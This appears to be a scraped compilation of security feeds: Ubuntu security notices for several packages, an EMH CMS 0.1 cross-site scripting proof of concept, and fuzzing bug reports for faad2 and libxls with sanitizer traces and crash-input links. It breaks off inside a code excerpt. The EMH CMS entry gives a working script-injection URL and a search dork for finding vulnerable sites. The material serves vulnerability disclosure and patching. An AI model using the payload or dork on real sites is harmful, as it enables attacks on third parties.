Ubuntu Security Notice 6293-1 - It was discovered that OpenStack Heat incorrectly handled certain hidden parameter values. A remote authenticated user could possibly use this issue to obtain sensitive data.

    ==========================================================================Ubuntu Security Notice USN-6293-1August 16, 2023heat vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:OpenStack Heat could be made to expose sensitive information.Software Description:- heat: OpenStack Orchestration ServiceDetails:It was discovered that OpenStack Heat incorrectly handled certain hiddenparameter values. A remote authenticated user could possibly use this issueto obtain sensitive data.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   python3-heat                    1:18.0.1-0ubuntu1.1In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6293-1   CVE-2023-1625Package Information:   https://launchpad.net/ubuntu/+source/heat/1:18.0.1-0ubuntu1.1

Ubuntu Security Notice USN-6293-1

Ubuntu Security Notice 6292-1 - It was discovered that Ceph incorrectly handled crash dumps. A local attacker could possibly use this issue to escalate privileges to root.

    ==========================================================================Ubuntu Security Notice USN-6292-1August 16, 2023ceph vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.04Summary:Ceph could be made to run programs as an administrator.Software Description:- ceph: distributed storage and file systemDetails:It was discovered that Ceph incorrectly handled crash dumps. A localattacker could possibly use this issue to escalate privileges to root.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.04:   ceph                            17.2.6-0ubuntu0.23.04.2   ceph-base                       17.2.6-0ubuntu0.23.04.2   ceph-common                     17.2.6-0ubuntu0.23.04.2In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6292-1   CVE-2022-3650Package Information:   https://launchpad.net/ubuntu/+source/ceph/17.2.6-0ubuntu0.23.04.2

Ubuntu Security Notice USN-6292-1

Ubuntu Security Notice 6291-1 - Hanno Bock discovered that GStreamer incorrectly handled certain datetime strings. An attacker could possibly use this issue to cause a denial of service or expose sensitive information.

    ==========================================================================Ubuntu Security Notice USN-6291-1August 16, 2023gstreamer1.0 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 LTS (Available with Ubuntu Pro)Summary:GStreamer could be made to denial of service if it received a speciallycrafted datetime string.Software Description:- gstreamer1.0: GObject introspection data for the GStreamer libraryDetails:Hanno Bock discovered that GStreamer incorrecly handled certain datetimestrings. An attacker could possibly use this issue to cause a denialof service or expose sensitive information.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 LTS (Available with Ubuntu Pro):  gstreamer1.0-tools              1.8.3-1~ubuntu0.1+esm1  libgstreamer1.0-0               1.8.3-1~ubuntu0.1+esm1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6291-1  CVE-2017-5838

Ubuntu Security Notice USN-6291-1

Ubuntu Security Notice 6290-1 - It was discovered that LibTIFF could be made to write out of bounds when processing certain malformed image files with the tiffcrop utility. If a user were tricked into opening a specially crafted image file, an attacker could possibly use this issue to cause tiffcrop to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, and Ubuntu 22.04 LTS. It was discovered that LibTIFF incorrectly handled certain image files. If a user were tricked into opening a specially crafted image file, an attacker could possibly use this issue to cause a denial of service. This issue only affected Ubuntu 23.04.

    ==========================================================================Ubuntu Security Notice USN-6290-1August 15, 2023tiff vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.04- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS (Available with Ubuntu Pro)- Ubuntu 16.04 LTS (Available with Ubuntu Pro)- Ubuntu 14.04 LTS (Available with Ubuntu Pro)Summary:Several security issues were fixed in LibTIFF.Software Description:- tiff: Tag Image File Format (TIFF) libraryDetails:It was discovered that LibTIFF could be made to write out of bounds whenprocessing certain malformed image files with the tiffcrop utility. If auser were tricked into opening a specially crafted image file, an attackercould possibly use this issue to cause tiffcrop to crash, resulting in adenial of service, or possibly execute arbitrary code. This issue onlyaffected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, and Ubuntu 22.04 LTS.(CVE-2022-48281)It was discovered that LibTIFF incorrectly handled certain image files. Ifa user were tricked into opening a specially crafted image file, anattacker could possibly use this issue to cause a denial of service. Thisissue only affected Ubuntu 23.04. (CVE-2023-2731)It was discovered that LibTIFF incorrectly handled certain image fileswith the tiffcp utility. If a user were tricked into opening a speciallycrafted image file, an attacker could possibly use this issue to causetiffcp to crash, resulting in a denial of service. (CVE-2023-2908)It was discovered that LibTIFF incorrectly handled certain file paths. Ifa user were tricked into specifying certain output paths, an attackercould possibly use this issue to cause a denial of service. This issueonly affected Ubuntu 20.04 LTS and Ubuntu 22.04 LTS. (CVE-2023-3316)It was discovered that LibTIFF could be made to write out of bounds whenprocessing certain malformed image files. If a user were tricked intoopening a specially crafted image file, an attacker could possibly usethis issue to cause a denial of service, or possibly execute arbitrarycode. (CVE-2023-3618)It was discovered that LibTIFF could be made to write out of bounds whenprocessing certain malformed image files. If a user were tricked intoopening a specially crafted image file, an attacker could possibly usethis issue to cause a denial of service, or possibly execute arbitrarycode. This issue only affected Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, andUbuntu 23.04. (CVE-2023-25433, CVE-2023-26966)It was discovered that LibTIFF did not properly managed memory whenprocessing certain malformed image files with the tiffcrop utility. If auser were tricked into opening a specially crafted image file, an attackercould possibly use this issue to cause tiffcrop to crash, resulting in adenial of service, or possibly execute arbitrary code. This issue onlyaffected Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu 23.04.(CVE-2023-26965)It was discovered that LibTIFF contained an arithmetic overflow. If a userwere tricked into opening a specially crafted image file, an attackercould possibly use this issue to cause a denial of service.(CVE-2023-38288, CVE-2023-38289)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.04:   libtiff-tools                   4.5.0-5ubuntu1.1   libtiff6                        4.5.0-5ubuntu1.1Ubuntu 22.04 LTS:   libtiff-tools                   4.3.0-6ubuntu0.5   libtiff5                        4.3.0-6ubuntu0.5Ubuntu 20.04 LTS:   libtiff-tools                   4.1.0+git191117-2ubuntu0.20.04.9   libtiff5                        4.1.0+git191117-2ubuntu0.20.04.9Ubuntu 18.04 LTS (Available with Ubuntu Pro):   libtiff-tools                   4.0.9-5ubuntu0.10+esm2   libtiff5                        4.0.9-5ubuntu0.10+esm2Ubuntu 16.04 LTS (Available with Ubuntu Pro):   libtiff-tools                   4.0.6-1ubuntu0.8+esm12   libtiff5                        4.0.6-1ubuntu0.8+esm12Ubuntu 14.04 LTS (Available with Ubuntu Pro):   libtiff-tools                   4.0.3-7ubuntu0.11+esm9   libtiff5                        4.0.3-7ubuntu0.11+esm9In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6290-1   CVE-2022-48281, CVE-2023-25433, CVE-2023-26965, CVE-2023-26966,   CVE-2023-2731, CVE-2023-2908, CVE-2023-3316, CVE-2023-3618,   CVE-2023-38288, CVE-2023-38289Package Information:   https://launchpad.net/ubuntu/+source/tiff/4.5.0-5ubuntu1.1   https://launchpad.net/ubuntu/+source/tiff/4.3.0-6ubuntu0.5https://launchpad.net/ubuntu/+source/tiff/4.1.0+git191117-2ubuntu0.20.04.9

Ubuntu Security Notice USN-6290-1

Ubuntu Security Notice 6289-1 - Several security issues were discovered in the WebKitGTK Web and JavaScript engines. If a user were tricked into viewing a malicious website, a remote attacker could exploit a variety of issues related to web browser security, including cross-site scripting attacks, denial of service attacks, and arbitrary code execution.

    ==========================================================================Ubuntu Security Notice USN-6289-1August 15, 2023webkit2gtk vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.04- Ubuntu 22.04 LTSSummary:Several security issues were fixed in WebKitGTK.Software Description:- webkit2gtk: Web content engine library for GTK+Details:Several security issues were discovered in the WebKitGTK Web and JavaScriptengines. If a user were tricked into viewing a malicious website, a remoteattacker could exploit a variety of issues related to web browser security,including cross-site scripting attacks, denial of service attacks, andarbitrary code execution.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.04:   libjavascriptcoregtk-4.0-18     2.40.5-0ubuntu0.23.04.1   libjavascriptcoregtk-4.1-0      2.40.5-0ubuntu0.23.04.1   libjavascriptcoregtk-6.0-1      2.40.5-0ubuntu0.23.04.1   libwebkit2gtk-4.0-37            2.40.5-0ubuntu0.23.04.1   libwebkit2gtk-4.1-0             2.40.5-0ubuntu0.23.04.1   libwebkitgtk-6.0-4              2.40.5-0ubuntu0.23.04.1Ubuntu 22.04 LTS:   libjavascriptcoregtk-4.0-18     2.40.5-0ubuntu0.22.04.1   libjavascriptcoregtk-4.1-0      2.40.5-0ubuntu0.22.04.1   libjavascriptcoregtk-6.0-1      2.40.5-0ubuntu0.22.04.1   libwebkit2gtk-4.0-37            2.40.5-0ubuntu0.22.04.1   libwebkit2gtk-4.1-0             2.40.5-0ubuntu0.22.04.1   libwebkitgtk-6.0-4              2.40.5-0ubuntu0.22.04.1This update uses a new upstream release, which includes additional bugfixes. After a standard system update you need to restart any applicationsthat use WebKitGTK, such as Epiphany, to make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6289-1   CVE-2023-38133, CVE-2023-38572, CVE-2023-38592, CVE-2023-38594,   CVE-2023-38595, CVE-2023-38597, CVE-2023-38599, CVE-2023-38600,   CVE-2023-38611Package Information:   https://launchpad.net/ubuntu/+source/webkit2gtk/2.40.5-0ubuntu0.23.04.1   https://launchpad.net/ubuntu/+source/webkit2gtk/2.40.5-0ubuntu0.22.04.1

Ubuntu Security Notice USN-6289-1

EMH CMS version 0.1 suffers from a cross site scripting vulnerability.

**EMH CMS 0.1 Cross Site Scripting**

Posted Aug 16, 2023

Authored by indoushka

EMH CMS version 0.1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | c58615aff6cd57a5ca22a34be62372e9e81249eb20b812f9a35ccd440af33052

Download | Favorite | View

**EMH CMS 0.1 Cross Site Scripting**

    ====================================================================================================================================| # Title     : EMH CMS v0.1 XSS Vulnerability                                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(64-bit)                                             | | # Vendor    : http://www.theemhglobal.com/                                                                                       |  | # Dork      : Designed by EMH TheEmhGlobal                                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /icoms/news_detail.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3E[+] http://127.0.0.1/freedomcentreinternationalorg/icoms/news_detail.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,973)
*   Arbitrary (16,202)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,280)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,345)
*   DoS (23,437)
*   Encryption (2,370)
*   Exploit (51,900)
*   File Inclusion (4,222)
*   File Upload (974)
*   Firewall (821)
*   Info Disclosure (2,775)
*   Intrusion Detection (892)
*   Java (3,044)
*   JavaScript (859)
*   Kernel (6,674)
*   Local (14,453)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,146)
*   Proof of Concept (2,338)
*   Protocol (3,602)
*   Python (1,535)
*   Remote (30,777)
*   Root (3,584)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,888)
*   Shell (3,181)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,373)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,778)
*   Web (9,668)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,944)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,815)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,470)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,734)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,822)
*   UNIX (9,291)
*   UnixWare (186)
*   Windows (6,573)
*   Other

EMH CMS 0.1 Cross Site Scripting

DVWA v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at blind\source\high.php.

CVE-2023-39848: GitHub - digininja/DVWA: Damn Vulnerable Web Application (DVWA)

Buffer Overflow vulnerability infaad2 v.2.10.1 allows a remote attacker to execute arbitrary code and cause a denial of service via the mp4info function in mp4read.c:1039.

Hi, developers of faad2:  
In the test of the binary faad(1d53978) instrumented with ASAN. There is a SEGV vulnerability in faad, /faad2/frontend/mp4read.c:1039:67 in mp4info. Here is the ASAN mode output:

\=================================================================  
\==58059==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000004 (pc 0x0000004d332f bp 0x7fff0e2f79b0 sp 0x7fff0e2f7900 T0)  
\==58059==The signal is caused by a READ memory access.  
\==58059==Hint: address points to the zero page.  
#0 0x4d332f in mp4info /faad2/frontend/mp4read.c:1039:67  
#1 0x4d2361 in mp4read\_open /faad2/frontend/mp4read.c:1085:9  
#2 0x4cc166 in decodeMP4file /faad2/frontend/main.c:820:9  
#3 0x4cc166 in faad\_main /faad2/frontend/main.c:1318:18  
#4 0x4cc166 in main /faad2/frontend/main.c:1376:12  
#5 0x7f99902d9c86 in \_\_libc\_start\_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310  
#6 0x41c419 in \_start (/faad2/build/faad+0x41c419)

AddressSanitizer can not provide additional info.  
SUMMARY: AddressSanitizer: SEGV /faad2/frontend/mp4read.c:1039:67 in mp4info  
\==58059==ABORTING

**Crash input**

https://github.com/17ssDP/fuzzer\_crashes/blob/main/faad2/segv

**Command Line**

./faad -o /dev/null @@

**Environment**

Ubuntu 16.04  
Clang 10.0.1  
gcc 5.5

CVE-2023-38858: A SEGV vulnerability found in faad2 · Issue #173 · knik0/faad2

Buffer Overflow vulnerability infaad2 v.2.10.1 allows a remote attacker to execute arbitrary code and cause a denial of service via the stcoin function in mp4read.c.

Hi, developers of faad2:  
In the test of the binary faad(1d53978) instrumented with ASAN. There is a heap-buffer-overflow vulnerability in faad, /faad2/frontend/mp4read.c:449:63 in static int stcoin(int size). Here is the ASAN mode output (I omit some repeated messages):

\=================================================================  
\==35951==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000038 at pc 0x0000004d678e bp 0x7ffe52ce3f90 sp 0x7ffe52ce3f88  
READ of size 4 at 0x602000000038 thread T0  
#0 0x4d678d in stcoin /faad2/frontend/mp4read.c:449:63  
#1 0x4d2cc5 in parse /faad2/frontend/mp4read.c:848:19  
#2 0x4d2dda in parse /faad2/frontend/mp4read.c:873:24  
#3 0x4d2dda in parse /faad2/frontend/mp4read.c:873:24  
#4 0x4d2dda in parse /faad2/frontend/mp4read.c:873:24  
#5 0x4d2dda in parse /faad2/frontend/mp4read.c:873:24  
#6 0x4d3bb8 in moovin /faad2/frontend/mp4read.c:940:15  
#7 0x4d2cc5 in parse /faad2/frontend/mp4read.c:848:19  
#8 0x4d2312 in mp4read\_open /faad2/frontend/mp4read.c:1071:16  
#9 0x4cc166 in decodeMP4file /faad2/frontend/main.c:820:9  
#10 0x4cc166 in faad\_main /faad2/frontend/main.c:1318:18  
#11 0x4cc166 in main /faad2/frontend/main.c:1376:12  
#12 0x7f49af044c86 in \_\_libc\_start\_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310  
#13 0x41c419 in \_start (/faad2/build/faad+0x41c419)

0x602000000038 is located 0 bytes to the right of 8-byte region \[0x602000000030,0x602000000038)  
allocated by thread T0 here:  
#0 0x4960ed in malloc (/faad2/build/faad+0x4960ed)  
#1 0x4d5817 in stscin /faad2/frontend/mp4read.c:353:27  
#2 0x4d2cc5 in parse /faad2/frontend/mp4read.c:848:19  
#3 0x4d2dda in parse /faad2/frontend/mp4read.c:873:24  
#4 0x4d2dda in parse /faad2/frontend/mp4read.c:873:24  
#5 0x4d2dda in parse /faad2/frontend/mp4read.c:873:24  
#6 0x4d2dda in parse /faad2/frontend/mp4read.c:873:24  
#7 0x4d3bb8 in moovin /faad2/frontend/mp4read.c:940:15  
#8 0x4d2cc5 in parse /faad2/frontend/mp4read.c:848:19  
#9 0x4d2312 in mp4read\_open /faad2/frontend/mp4read.c:1071:16  
#10 0x4cc166 in decodeMP4file /faad2/frontend/main.c:820:9  
#11 0x4cc166 in faad\_main /faad2/frontend/main.c:1318:18  
#12 0x4cc166 in main /faad2/frontend/main.c:1376:12  
#13 0x7f49af044c86 in \_\_libc\_start\_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310

SUMMARY: AddressSanitizer: heap-buffer-overflow /faad2/frontend/mp4read.c:449:63 in stcoin  
Shadow bytes around the buggy address:  
0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
\=>0x0c047fff8000: fa fa 00 02 fa fa 00\[fa\]fa fa 00 00 fa fa fa fa  
0x0c047fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
Shadow byte legend (one shadow byte represents 8 application bytes):  
Addressable: 00  
Partially addressable: 01 02 03 04 05 06 07  
Heap left redzone: fa  
Freed heap region: fd  
Stack left redzone: f1  
Stack mid redzone: f2  
Stack right redzone: f3  
Stack after return: f5  
Stack use after scope: f8  
Global redzone: f9  
Global init order: f6  
Poisoned by user: f7  
Container overflow: fc  
Array cookie: ac  
Intra object redzone: bb  
ASan internal: fe  
Left alloca redzone: ca  
Right alloca redzone: cb  
Shadow gap: cc  
\==35951==ABORTING

**Crash input**

https://github.com/17ssDP/fuzzer\_crashes/blob/main/faad2/hbo-1

**Command Line**

./faad -o /dev/null @@

**Environment**

Ubuntu 16.04  
Clang 10.0.1  
gcc 5.5

CVE-2023-38857: A heap-buffer-overflow vulnerability found in mp4read.c:449:63 · Issue #171 · knik0/faad2

Buffer Overflow vulnerability in libxlsv.1.6.2 allows a remote attacker to execute arbitrary code and cause a denial of service via a crafted XLS file to the unicode_decode_wcstombs function in xlstool.c:266.

Hi, developers of libxls:  
In the test of the binary test2_libxls instrumented with ASAN. There are 6 heap-buffer-overflow and 1 SEGV vulnerabilities in  
src/xls.c:1015, src/xls.c:1018, src/xlstool.c:266, src/xlstool.c:411, src/xlstool.c:395, and src/xlstool.c:296. Here is the ASAN mode output (I omit some unnecessary messages):

**Vulnerability 1, src/xls.c:1015**

\=================================================================  
\==54038==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000001070 at pc 0x0000004cf305 bp 0x7fff55151350 sp 0x7fff55151348  
READ of size 2 at 0x602000001070 thread T0  
#0 0x4cf304 in xls\_parseWorkBook /libxls/src/xls.c:1015:37  
#1 0x4d7ee5 in xls\_open\_ole /libxls/src/xls.c:1480:14  
#2 0x4c5b4d in main /libxls/test/test2.c:60:9  
#3 0x7f7fd826bc86 in \_\_libc\_start\_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310  
#4 0x41c109 in \_start (/libxls/test2\_libxls+0x41c109)

0x602000001071 is located 0 bytes to the right of 1-byte region \[0x602000001070,0x602000001071)  
allocated by thread T0 here:  
#0 0x4960f9 in realloc (/libxls/test2\_libxls+0x4960f9)  
#1 0x4cb76a in xls\_parseWorkBook /libxls/src/xls.c:860:24  
#2 0x4d7ee5 in xls\_open\_ole /libxls/src/xls.c:1480:14

SUMMARY: AddressSanitizer: heap-buffer-overflow /libxls/src/xls.c:1015:37 in xls\_parseWorkBook  
Shadow bytes around the buggy address:  
0x0c047fff81b0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fa  
0x0c047fff81c0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd  
0x0c047fff81d0: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fd  
0x0c047fff81e0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd  
0x0c047fff81f0: fa fa fd fd fa fa fd fd fa fa fd fa fa fa fd fd  
\=>0x0c047fff8200: fa fa fd fd fa fa fd fd fa fa fd fa fa fa\[01\]fa  
0x0c047fff8210: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c047fff8220: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c047fff8230: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c047fff8240: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c047fff8250: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
Shadow byte legend (one shadow byte represents 8 application bytes):  
Addressable: 00  
Partially addressable: 01 02 03 04 05 06 07  
Heap left redzone: fa  
Freed heap region: fd  
Stack left redzone: f1  
Stack mid redzone: f2  
Stack right redzone: f3  
Stack after return: f5  
Stack use after scope: f8  
Global redzone: f9  
Global init order: f6  
Poisoned by user: f7  
Container overflow: fc  
Array cookie: ac  
Intra object redzone: bb  
ASan internal: fe  
Left alloca redzone: ca  
Right alloca redzone: cb  
Shadow gap: cc  
\==54038==ABORTING

**Vulnerability 2, src/xls.c:1018**

\=================================================================  
\==24506==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000533 at pc 0x0000004ceb06 bp 0x7fffbc197e90 sp 0x7fffbc197e88  
READ of size 1 at 0x602000000533 thread T0  
#0 0x4ceb05 in xls\_parseWorkBook /libxls/src/xls.c:1018:38  
#1 0x4d7ee5 in xls\_open\_ole /libxls/src/xls.c:1480:14  
#2 0x4c5b4d in main /libxls/test/test2.c:60:9  
#3 0x7ffb26d5bc86 in \_\_libc\_start\_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310  
#4 0x41c109 in \_start (/libxls/test2\_libxls+0x41c109)

0x602000000533 is located 0 bytes to the right of 3-byte region \[0x602000000530,0x602000000533)  
allocated by thread T0 here:  
#0 0x4960f9 in realloc (/libxls/test2\_libxls+0x4960f9)  
#1 0x4cb76a in xls\_parseWorkBook /libxls/src/xls.c:860:24  
#2 0x4d7ee5 in xls\_open\_ole /libxls/src/xls.c:1480:14

SUMMARY: AddressSanitizer: heap-buffer-overflow /libxls/src/xls.c:1018:38 in xls\_parseWorkBook

**Vulnerability 3, src/xlstool.c:266**

\=================================================================  
\==22361==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000000954 at pc 0x0000004c6ec4 bp 0x7ffd36438770 sp 0x7ffd36438768  
READ of size 1 at 0x603000000954 thread T0  
#0 0x4c6ec3 in unicode\_decode\_wcstombs /libxls/src/xlstool.c:266:38  
#1 0x4cc9a1 in xls\_parseWorkBook /libxls/src/xls.c:1020:16  
#2 0x4d7ee5 in xls\_open\_ole /libxls/src/xls.c:1480:14  
#3 0x4c5b4d in main /libxls/test/test2.c:60:9  
#4 0x7f0ca9da0c86 in \_\_libc\_start\_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310  
#5 0x41c109 in \_start (/libxls/test2\_libxls+0x41c109)

0x603000000954 is located 0 bytes to the right of 20-byte region \[0x603000000940,0x603000000954)  
allocated by thread T0 here:  
#0 0x4960f9 in realloc (/libxls/test2\_libxls+0x4960f9)  
#1 0x4cb76a in xls\_parseWorkBook /libxls/src/xls.c:860:24  
#2 0x4d7ee5 in xls\_open\_ole /libxls/src/xls.c:1480:14

SUMMARY: AddressSanitizer: heap-buffer-overflow /libxls/src/xlstool.c:266:38 in unicode\_decode\_wcstombs

**Vulnerability 4, src/xlstool.c:411**

\=================================================================  
\==27366==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000514 at pc 0x0000004c7363 bp 0x7ffc82ab3a00 sp 0x7ffc82ab39f8  
READ of size 1 at 0x602000000514 thread T0  
#0 0x4c7362 in get\_string /libxls/src/xlstool.c:411:8  
#1 0x4cc9a1 in xls\_parseWorkBook /libxls/src/xls.c:1020:16  
#2 0x4d7ee5 in xls\_open\_ole /libxls/src/xls.c:1480:14  
#3 0x4c5b4d in main /libxls/test/test2.c:60:9  
#4 0x7fd80a51ac86 in \_\_libc\_start\_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310  
#5 0x41c109 in \_start (/libxls/test2\_libxls+0x41c109)

0x602000000514 is located 0 bytes to the right of 4-byte region \[0x602000000510,0x602000000514)  
allocated by thread T0 here:  
#0 0x4960f9 in realloc (/libxls/test2\_libxls+0x4960f9)  
#1 0x4cb76a in xls\_parseWorkBook /libxls/src/xls.c:860:24  
#2 0x4d7ee5 in xls\_open\_ole /libxls/src/xls.c:1480:14

SUMMARY: AddressSanitizer: heap-buffer-overflow /libxls/src/xlstool.c:411:8 in get\_string

**Vulnerability 5, src/xlstool.c:296**

\=================================================================  
\==19616==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x616000000888 at pc 0x0000004c6a11 bp 0x7fff62de6cc0 sp 0x7fff62de6cb8  
READ of size 4 at 0x616000000888 thread T0  
#0 0x4c6a10 in transcode\_latin1\_to\_utf8 /libxls/src/xlstool.c:296:12  
#1 0x4c6a10 in codepage\_decode /src/xlstool.c:321:16  
#2 0x4cc9a1 in xls\_parseWorkBook /libxls/src/xls.c:1020:16  
#3 0x4d7ee5 in xls\_open\_ole /libxls/src/xls.c:1480:14  
#4 0x4c5b4d in main /libxls/test/test2.c:60:9  
#5 0x7f8d9df3ac86 in \_\_libc\_start\_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310  
#6 0x41c109 in \_start (/libxls/test2\_libxls+0x41c109)

0x616000000888 is located 0 bytes to the right of 520-byte region \[0x616000000680,0x616000000888)  
allocated by thread T0 here:  
#0 0x4960f9 in realloc (/libxls/test2\_libxls+0x4960f9)  
#1 0x4cb76a in xls\_parseWorkBook /libxls/src/xls.c:860:24  
#2 0x4d7ee5 in xls\_open\_ole /libxls/src/xls.c:1480:14

SUMMARY: AddressSanitizer: heap-buffer-overflow /libxls/src/xlstool.c:296:12 in transcode\_latin1\_to\_utf8

**Vulnerability 6, src/xlstool.c:395**

\=================================================================  
\==43284==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000005d2 at pc 0x0000004c7329 bp 0x7fffc6505260 sp 0x7fffc6505258  
READ of size 1 at 0x6020000005d2 thread T0  
#0 0x4c7328 in get\_string /libxls/src/xlstool.c:395:13  
#1 0x4cc9a1 in xls\_parseWorkBook /libxls/src/xls.c:1020:16  
#2 0x4d7ee5 in xls\_open\_ole /libxls/src/xls.c:1480:14  
#3 0x4c5b4d in main /libxls/test/test2.c:60:9  
#4 0x7fa1da3bcc86 in \_\_libc\_start\_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310  
#5 0x41c109 in \_start (/libxls/test2\_libxls+0x41c109)

0x6020000005d2 is located 0 bytes to the right of 2-byte region \[0x6020000005d0,0x6020000005d2)  
allocated by thread T0 here:  
#0 0x4960f9 in realloc (/libxls/test2\_libxls+0x4960f9)  
#1 0x4cb76a in xls\_parseWorkBook /libxls/src/xls.c:860:24  
#2 0x4d7ee5 in xls\_open\_ole /libxls/src/xls.c:1480:14

SUMMARY: AddressSanitizer: heap-buffer-overflow /libxls/src/xlstool.c:395:13 in get\_string

**Vulnerability 7**

\=================================================================  
\==38465==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000004cc923 bp 0x7ffee6e50330 sp 0x7ffee6e501a0 T0)  
\==38465==The signal is caused by a READ memory access.  
\==38465==Hint: address points to the zero page.  
#0 0x4cc923 in xls\_parseWorkBook /libxls/src/xls.c:1015:41  
#1 0x4d7ee5 in xls\_open\_ole /libxls/src/xls.c:1480:14  
#2 0x4c5b4d in main /libxls/test/test2.c:60:9  
#3 0x7f032a36dc86 in \_\_libc\_start\_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310  
#4 0x41c109 in \_start (/libxls/test2\_libxls+0x41c109)

AddressSanitizer can not provide additional info.  
SUMMARY: AddressSanitizer: SEGV /libxls/src/xls.c:1015:41 in xls\_parseWorkBook  
\==38465==ABORTING

**Crash input**

https://github.com/17ssDP/fuzzer\_crashes/tree/main/libxls

**Code Location**

xls.c:1010-1025

    case XLS_RECORD_STYLE:
    			if(xls_debug) {
